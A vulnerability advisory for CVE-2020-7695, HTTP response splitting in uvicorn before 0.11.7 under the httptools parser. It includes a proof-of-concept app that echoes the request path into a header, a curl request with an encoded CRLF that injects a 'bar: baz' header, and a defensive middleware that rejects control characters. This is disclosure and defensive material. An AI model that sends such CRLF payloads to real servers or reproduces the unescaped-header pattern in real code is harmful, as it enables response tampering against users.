HTTP Response Splitting

Affecting uvicorn package, versions [,0.11.7)

Overview

uvicorn is a lightning-fast ASGI server.

Affected versions of this package are vulnerable to HTTP Response Splitting. Uvicorn's HTTP protocol implementation for the httptools parser (selected with --http httptools) does not escape or reject CRLF sequences in HTTP header values. Whenever an application builds response headers from crafted input, an attacker can use this to add arbitrary headers to the HTTP response, or even return an arbitrary response body.

PoC

async def app(scope, receive, send):
    assert scope['type'] == 'http'
    await send({
        'type': 'http.response.start',
        'status': 200,
        'headers': [
            [b'Content-Type', b'text/plain'],
            # The request path is copied into a header value unescaped; a path
            # containing a percent-encoded CRLF reaches the header as a raw CRLF.
            [b'Referer', scope['path'].encode()],
        ]
    })
    await send({
        'type': 'http.response.body',
        'body': b'Hello, world!',
    })

uvicorn poc-3:app --port 9999 --http httptools

To exploit this vulnerability, make a GET request with a crafted URL path like so:

curl -v 'http://localhost:9999/foo%0d%0abar:%20baz'

Uvicorn will return an additional HTTP header "bar" with the value "baz":

* Trying 127.0.0.1...
* Connected to localhost (127.0.0.1) port 9999 (#0)
> GET /foo%0d%0abar:%20baz HTTP/1.1
> Host: localhost:9999
> User-Agent: curl/7.58.0
> Accept: */*
>

< HTTP/1.1 200 OK
< date: Sun, 26 Apr 2020 22:38:18 GMT
< server: uvicorn
< content-type: text/plain
< referer: /foo
< bar: baz
< transfer-encoding: chunked
<

Remediation

Upgrade uvicorn to version 0.11.7 or higher.
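Upgrading is the fix. As an added example (not code from the advisory or from the uvicorn project), the following shows the check a defender would want at the application layer as defence in depth: an ASGI middleware that rejects any response header whose name or value contains CR, LF or NUL before the server serialises it. HeaderGuardMiddleware, sanitize_headers, header_is_safe, echo_path_app and run_request are all hypothetical names introduced here; echo_path_app mirrors the PoC pattern above, and run_request drives it with a constructed in-memory scope instead of a real server.

```python
import asyncio
import re

# CR, LF and NUL in a header name or value let the value terminate the current
# header line and start a new one (CWE-113). Reject all three outright instead
# of trying to escape them: a header value containing a line break is never
# legitimate.
_CONTROL_BYTES = re.compile(rb"[\r\n\x00]")


def header_is_safe(name: bytes, value: bytes) -> bool:
    """True when neither the header name nor its value contains CR, LF or NUL."""
    return _CONTROL_BYTES.search(name) is None and _CONTROL_BYTES.search(value) is None


def sanitize_headers(headers):
    """Return the headers as (name, value) tuples, or raise ValueError on the
    first header that could split the response."""
    clean = []
    for name, value in headers:
        if not header_is_safe(name, value):
            raise ValueError(f"control character in response header {name!r}: {value!r}")
        clean.append((name, value))
    return clean


class HeaderGuardMiddleware:
    """Hypothetical ASGI middleware (not part of uvicorn) that validates every
    http.response.start message before handing it to the server."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] != "http":
            await self.app(scope, receive, send)
            return

        async def guarded_send(message):
            if message["type"] == "http.response.start":
                message = dict(message, headers=sanitize_headers(message.get("headers", [])))
            await send(message)

        await self.app(scope, receive, guarded_send)


async def echo_path_app(scope, receive, send):
    """Same pattern as the advisory's PoC: the request path is copied into a
    response header without validation."""
    assert scope["type"] == "http"
    await send({
        "type": "http.response.start",
        "status": 200,
        "headers": [
            (b"content-type", b"text/plain"),
            (b"referer", scope["path"].encode()),
        ],
    })
    await send({"type": "http.response.body", "body": b"Hello, world!"})


def run_request(app, path: str):
    """Drive an ASGI app in-process with a constructed scope and return the
    messages it sent. A real server percent-decodes the request target before
    filling scope["path"], so the crafted PoC URL arrives here as a raw CRLF."""
    scope = {"type": "http", "method": "GET", "path": path, "headers": []}
    sent = []

    async def receive():
        return {"type": "http.request", "body": b"", "more_body": False}

    async def send(message):
        sent.append(message)

    asyncio.run(app(scope, receive, send))
    return sent


if __name__ == "__main__":
    guarded = HeaderGuardMiddleware(echo_path_app)
    print(run_request(guarded, "/foo")[0]["headers"])
    try:
        run_request(guarded, "/foo\r\nbar: baz")
    except ValueError as exc:
        print("blocked:", exc)
```

With the guard in place the benign path still produces the two expected messages, while the PoC path (`/foo` followed by a decoded CRLF and `bar: baz`) is refused with a ValueError before any bytes reach the wire, so the injected "bar: baz" header never appears. Rejecting rather than stripping is deliberate: a request that puts line breaks into a header value is worth logging as an attack indicator, not silently repairing.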

CVSS Score

5.3
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    None
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:U/RC:C
Credit
Everardo Padilla Saca
CVE
CVE-2020-7695
CWE
CWE-113
Snyk ID
SNYK-PYTHON-UVICORN-570471
Disclosed
10 Jul, 2020
Published
20 Jul, 2020